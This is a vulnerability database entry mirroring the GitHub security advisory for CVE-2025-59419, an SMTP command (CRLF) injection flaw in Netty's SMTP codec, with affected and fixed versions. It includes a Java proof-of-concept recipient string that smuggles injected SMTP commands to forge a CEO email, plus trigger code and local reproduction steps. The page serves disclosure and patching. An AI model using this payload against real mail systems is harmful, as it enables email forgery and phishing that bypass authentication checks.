ghsa-jq43-27x9-3v86
Vulnerability from github
Published
2025-10-15 17:12
Modified
2025-10-17 21:32
Severity ?
7.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P
Summary
Netty has SMTP Command Injection Vulnerability that Allows Email Forgery
Details

Summary

An SMTP Command Injection (CRLF Injection) vulnerability in Netty's SMTP codec allows a remote attacker who can control SMTP command parameters (e.g., an email recipient) to forge arbitrary emails from the trusted server. This bypasses standard email authentication and can be used to impersonate executives and forge high-stakes corporate communications.

Details

The root cause is the lack of input validation for Carriage Return (\r) and Line Feed (\n) characters in user-supplied parameters.

The vulnerable code is in io.netty.handler.codec.smtp.DefaultSmtpRequest, where parameters are directly concatenated into the SMTP command string. For example, when SmtpRequests.rcpt(recipient) is called, a malicious recipient string containing CRLF sequences can inject a new, separate SMTP command.

Because the injected commands are sent from the server's trusted IP, any resulting emails will likely pass SPF and DKIM checks, making them appear legitimate to the victim's email client.

PoC

A minimal PoC involves passing a crafted string containing CRLF sequences to any SmtpRequest that accepts user-controlled parameters.

1. Malicious Payload

The core of the exploit is the payload, where new SMTP commands are injected into a parameter.

java // The legitimate recipient is followed by an injected email sequence String injected_recipient = "legit-recipient@example.com\r\n" + "MAIL FROM:<ceo@trusted-domain.com>\r\n" + "RCPT TO:<victim@anywhere.com>\r\n" + "DATA\r\n" + "From: ceo@trusted-domain.com\r\n" + "To: victim@anywhere.com\r\n" + "Subject: Urgent: Phishing Email\r\n" + "\r\n" + "This is a forged email that will pass authentication checks.\r\n" + ".\r\n" + "QUIT\r\n";

2. Triggering the Vulnerability

The vulnerability is triggered when this payload is used to create an SMTP request.

```java // The Netty SMTP codec will fail to sanitize this input SmtpRequest maliciousRequest = SmtpRequests.rcpt(injected_recipient);

// When this request is sent to an SMTP server, the injected commands // will be executed, sending a forged email. channel.writeAndFlush(maliciousRequest); ```

3. Full Reproduction Steps

A complete, runnable PoC is available as a GitHub Gist to demonstrate the full attack flow against a local SMTP server

  • Full PoC Code: https://gist.github.com/DepthFirstDisclosures/ddacca28cb94b48fa8ab998cef59ed8c

To run the full PoC:

  1. Set up a local SMTP server. The easiest way is using MailHog:
    • On macOS: brew install mailhog && mailhog
    • Using Docker: docker run -p 1025:1025 -p 8025:8025 mailhog/mailhog
  2. Run the PoC code. The code will connect to the SMTP server at localhost:1025 and send the malicious payload.
  3. Verify the result. Open the MailHog web UI at http://localhost:8025. You will see the forged email sent to victim@anywhere.com from ceo@trusted-domain.com.

Impact

This is a SMTP Command Injection vulnerability. It impacts any application using netty-codec-smtp to construct SMTP requests where an attacker can control or influence any of the SMTP string parameters (e.g., from, recipient, helo hostname).

The primary impacts are: * Economic Manipulation & Disinformation: Attackers can forge emails from high-value targets (e.g., corporate executives, government officials) and send them to journalists, financial institutions, or the public. A fraudulent email announcing false financial results, a fake merger, or a security breach could be used to manipulate stock prices or cause significant economic disruption. * Sophisticated Phishing: Attackers can send high-fidelity phishing emails that bypass email authentication (SPF/DKIM) and appear to come from a trusted source, making them highly likely to deceive users.

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.netty:netty-codec-smtp"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.2.0.Alpha1"
            },
            {
              "fixed": "4.2.7.Final"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Maven",
        "name": "io.netty:netty-codec-smtp"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.1.128.Final"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-59419"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-78",
      "CWE-93"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-15T17:12:55Z",
    "nvd_published_at": "2025-10-15T16:15:35Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nAn SMTP Command Injection (CRLF Injection) vulnerability in Netty\u0027s SMTP codec allows a remote attacker who can control SMTP command parameters (e.g., an email recipient) to forge arbitrary emails from the trusted server. This bypasses standard email authentication and can be used to impersonate executives and forge high-stakes corporate communications.\n\n### Details\nThe root cause is the lack of input validation for Carriage Return (\\r) and Line Feed (\\n) characters in user-supplied parameters.\n\nThe vulnerable code is in io.netty.handler.codec.smtp.DefaultSmtpRequest, where parameters are directly concatenated into the SMTP command string. For example, when SmtpRequests.rcpt(recipient) is called, a malicious recipient string containing CRLF sequences can inject a new, separate SMTP command.\n\nBecause the injected commands are sent from the server\u0027s trusted IP, any resulting emails will likely pass SPF and DKIM checks, making them appear legitimate to the victim\u0027s email client.\n\n### PoC\nA minimal PoC involves passing a crafted string containing CRLF sequences to any `SmtpRequest` that accepts user-controlled parameters.\n\n**1. Malicious Payload**\n\nThe core of the exploit is the payload, where new SMTP commands are injected into a parameter.\n\n```java\n// The legitimate recipient is followed by an injected email sequence\nString injected_recipient = \"legit-recipient@example.com\\r\\n\" +\n                          \"MAIL FROM:\u003cceo@trusted-domain.com\u003e\\r\\n\" +\n                          \"RCPT TO:\u003cvictim@anywhere.com\u003e\\r\\n\" +\n                          \"DATA\\r\\n\" +\n                          \"From: ceo@trusted-domain.com\\r\\n\" +\n                          \"To: victim@anywhere.com\\r\\n\" +\n                          \"Subject: Urgent: Phishing Email\\r\\n\" +\n                          \"\\r\\n\" +\n                          \"This is a forged email that will pass authentication checks.\\r\\n\" +\n                          \".\\r\\n\" +\n                          \"QUIT\\r\\n\";\n```\n\n**2. Triggering the Vulnerability**\n\nThe vulnerability is triggered when this payload is used to create an SMTP request.\n\n```java\n// The Netty SMTP codec will fail to sanitize this input\nSmtpRequest maliciousRequest = SmtpRequests.rcpt(injected_recipient);\n\n// When this request is sent to an SMTP server, the injected commands\n// will be executed, sending a forged email.\nchannel.writeAndFlush(maliciousRequest);\n```\n\n**3. Full Reproduction Steps**\n\nA complete, runnable PoC is available as a GitHub Gist to demonstrate the full attack flow against a local SMTP server\n\n*   **Full PoC Code:** https://gist.github.com/DepthFirstDisclosures/ddacca28cb94b48fa8ab998cef59ed8c\n\nTo run the full PoC:\n\n1.  **Set up a local SMTP server.** The easiest way is using MailHog:\n    *   On macOS: `brew install mailhog \u0026\u0026 mailhog`\n    *   Using Docker: `docker run -p 1025:1025 -p 8025:8025 mailhog/mailhog`\n2.  **Run the PoC code.** The code will connect to the SMTP server at `localhost:1025` and send the malicious payload.\n3.  **Verify the result.** Open the MailHog web UI at `http://localhost:8025`. You will see the forged email sent to `victim@anywhere.com` from `ceo@trusted-domain.com`.\n\n### Impact\nThis is a SMTP Command Injection vulnerability. It impacts any application using `netty-codec-smtp` to construct SMTP requests where an attacker can control or influence any of the SMTP string parameters (e.g., `from`, `recipient`, `helo` hostname).\n\nThe primary impacts are:\n*   **Economic Manipulation \u0026 Disinformation:** Attackers can forge emails from high-value targets (e.g., corporate executives, government officials) and send them to journalists, financial institutions, or the public. A fraudulent email announcing false financial results, a fake merger, or a security breach could be used to manipulate stock prices or cause significant economic disruption.\n*   **Sophisticated Phishing:** Attackers can send high-fidelity phishing emails that bypass email authentication (SPF/DKIM) and appear to come from a trusted source, making them highly likely to deceive users.",
  "id": "GHSA-jq43-27x9-3v86",
  "modified": "2025-10-17T21:32:39Z",
  "published": "2025-10-15T17:12:55Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/netty/netty/security/advisories/GHSA-jq43-27x9-3v86"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59419"
    },
    {
      "type": "WEB",
      "url": "https://github.com/netty/netty/commit/1782e8c2060a244c4d4e6f9d9112d5517ca05120"
    },
    {
      "type": "WEB",
      "url": "https://github.com/netty/netty/commit/2b3fddd3339cde1601f622b9ce5e54c39f24c3f9"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/DepthFirstDisclosures/ddacca28cb94b48fa8ab998cef59ed8c"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/netty/netty"
    },
    {
      "type": "WEB",
      "url": "https://www.depthfirst.com/post/our-ai-agent-found-a-netty-zero-day-that-bypasses-email-authentication-the-story-of-cve-2025-59419"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Netty has SMTP Command Injection Vulnerability that Allows Email Forgery"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.